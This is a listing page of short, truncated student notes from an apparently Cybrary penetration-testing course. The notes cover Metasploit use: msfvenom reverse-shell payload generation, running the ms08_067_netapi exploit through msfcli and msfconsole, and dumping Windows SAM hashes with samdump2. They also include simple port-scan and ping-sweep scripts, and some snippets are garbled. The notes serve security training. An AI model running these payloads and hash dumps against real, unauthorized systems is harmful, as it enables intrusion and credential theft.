Advanced Penetration Testing Notes

msfvenom notes

cd /usr/share/metasploit-framework/ cd /root msfvenom -h msfvenom -p windows/metasploit/reverse_tcp -o msfvenom -p windows/metasploit/reverse_tcp LHOST=[host_IP] LPORT=[port_no.] -f exe > meterpreter.exe msfconsole info exploit/multi/handler use m [view]

By: Subhasish Saha | Related Lesson: Metasploit (part 6) msfvenom | Modified: July 14, 2017

msfcli notes

msfcli -h msfcli exploit/windows/smb/ms08_067_netapi P msfcli exploit/windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp 0 msfcli exploit/windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=[host_IP] LHOST=[host_IP] E [view]

By: Subhasish Saha | Related Lesson: Metasploit (part 5) msfcli | Modified: July 14, 2017

Auxiliary Module notes

exploit(ms08_067_neapi) > use auxiliary/scanner/smb/pipe_auditorexploit(ms08_067_neapi) > show optionsexploit(ms08_067_neapi) > set RHOSTS [host_IP]exploit(ms08_067_neapi) > exploit       [view]

By: Subhasish Saha | Related Lesson: Metasploit (part 4) Auxiliary Module | Modified: July 14, 2017

Operation notes

msfupdate service postgresql startservice metasploit startmsfconsolesearch ms08-067info exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapiexploit(ms08_067_netapi) > optionsexploit(ms08_067_netapi) > set RHOST [host_IP]ex [view]

By: Subhasish Saha | Related Lesson: Metasploit (part 3) Operation | Modified: July 14, 2017

SAMPDUMP2

1) Dump the syskey bootkey from Windows System Hive  root@kali:/mnt/Windows/System32/config# bkhive SYSTEM hive.txt; 2) Dump the Windows password hashes.root@kali:/mnt/Windows/System32/config# samdump2 SAM hive.txt > hash.txt; 3) Crack passwor [view]

By: Giuseppe | Related Lesson: Passwords (part 1) Password Attacks | Modified: July 13, 2017

Fundamentals notes

vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb https://www.exploit-db.com/ [view]

By: Subhasish Saha | Related Lesson: Metasploit (part 2) Fundamentals | Modified: July 14, 2017

python.py

#!/usr/bin/python import socket  ip = raw_input(”Enter the IP address:   ”) port =input(”Enter The Port Number:  ”) [view]

By: howaisi | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: July 13, 2017

Python Import notes

cprogram.c:#include <stdio.h> int main(int argc, char *argv[]){      if(argc < 2){          printf(”%s\n”, ”Pass your name as an argument”);          return -1;      }else{         [view]

By: Subhasish Saha | Related Lesson: Programming (part 5) Python Import Command | Modified: July 13, 2017

Python for Port notes

python.py:#!/usr/bin/pythonimport socketip = raw_input(”Enter the IP address: ”)port = input(”Enter the port number: ”)sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if sock.connect_ex{{ip.port)):           [view]

By: Subhasish Saha | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: July 13, 2017

Network Pings notes

ping.sh:#!/bin/bashif [”$1” == ””] thenecho ”Usage: ./ping.sh [network]”echo ”Example: ./ping.sh 192.168.1”elsefor x in : seq 1 254 ; doping -c 1 $1.$x | grep ”64 bytes” | cut -d ”  [view]

By: Subhasish Saha | Related Lesson: Programming (part 3) Network Pings | Modified: July 13, 2017

« First ‹ Previous 1 18 108 116 117 118 119 120 128 218 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel